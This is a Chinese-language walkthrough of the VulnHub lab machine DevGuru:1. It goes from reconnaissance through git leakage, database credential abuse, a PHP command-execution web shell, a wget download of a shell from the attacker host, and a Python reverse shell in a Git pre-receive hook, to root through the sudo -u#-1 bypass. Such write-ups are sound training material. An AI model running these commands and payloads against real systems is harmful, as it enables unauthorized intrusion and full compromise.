OSCP难度靶机之DevGuru:1
2022-11-15 08:32:38 Author: 安全孺子牛(查看原文) 阅读量:26 收藏

虚拟机下载地址:https://www.vulnhub.com/entry/devguru-1,620/
虚拟机简介:您的任务是在他们的公司网站上查找漏洞并获取root权限
目标:1个flag
级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.144

查看开放22、80、8585端口

2、渗透测试

2.1 WEB渗透

1.爆破信息泄露

根据NMAP扫描结果,显示80端口存在git信息泄露,并且获取到站点域名为devguru.local

使用git泄露工具进行利用,链接地址https://github.com/internetwache/GitTools

git clone https://github.com/internetwache/GitTools.git
cd Dumper
mkdir website
./gitdumper.sh http://192.168.207.144/.git/ ./website

2.导出git所有文件

查看下载的TXT文件获取到账号和密码信息

cd GitTools/Extractor
./extractor.sh ../Dumper/website ./web

查看存在adminer.php页面

cd web/0-7de9115700c5656c670b34987c6fbffd39d90cf2
ls

3.访问站点数据库

在本地config目录中发现数据库的账号和密码信息

基于上面内容可以成功登录数据库后台

选择数据库账号信息,获取到账号frank的密码信息

4.重置账号密码

查看密码加密方式,通过站点进行确认https://www.tunnelsup.com/hash-analyzer/

使用在线生成密码,https://www.devglan.com/online-tools/bcrypt-hash-generator

把生成的密码替换密码字段

使用如下URL成功登录,http://192.168.207.144/backend/

登录成功后站点信息如下

5.命令执行

在控制台面板中添加命令执行参数

function onStart()
{
$this->page["myVar"] = shell_exec($_GET['cmd']);
}

选择Markup中添加新的方法并保存

访问站点进行测试,查看网页源代码

http://192.168.207.144/shell?cmd=ls%20-la

6.下载反弹shell

在kali中开启http服务

python -m http.server 8080

通过命令执行方式下载远端webshell木马文件

http://192.168.207.144/shell?cmd=wget http://192.168.207.130:8080/shell.php

使用NC进行监听并访问webshell

http://192.168.207.144/shell.php

7.查看主机信息

在/var/backups/中发现有一个备份的配置文件

在服务字段中发现备份文件在8585端口的配置服务

在配置文件中发现另外一个mysql的账号和密码信息

通过获取到的账号成功登录新的数据库中,并发现同时存在frank账号

重新修改frank账号密码,并修改密码加密方式为bcrypt

8.登录8585端口服务

通过修改后的密码成功登录该服务

选择仓库地址

选择设置--Git Hooks---Pre-receive

写入反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.207.130",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

选择README.md文件进行随意修改并进行提交

成功获取到反弹shell连接

2.2 主机渗透

1.查看用户FLAG

cat /home/frank/user.txt

2.查看当前用户sudo权限

sudo -l
sudo -V

3.sudo提权

sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'

4.查看FLAG

cat /root/root.txt


文章来源: http://mp.weixin.qq.com/s?__biz=MzI2MDI0NTM2Nw==&mid=2247489328&idx=1&sn=a9e118d700727e5b20d92f87d0871caf&chksm=ea6dc528dd1a4c3ebfad8d4cdd3cfcdd8f1dbb631da71520c9161d9b0c3aac59cc24963409e8#rd
如有侵权请联系:admin#unsafe.sh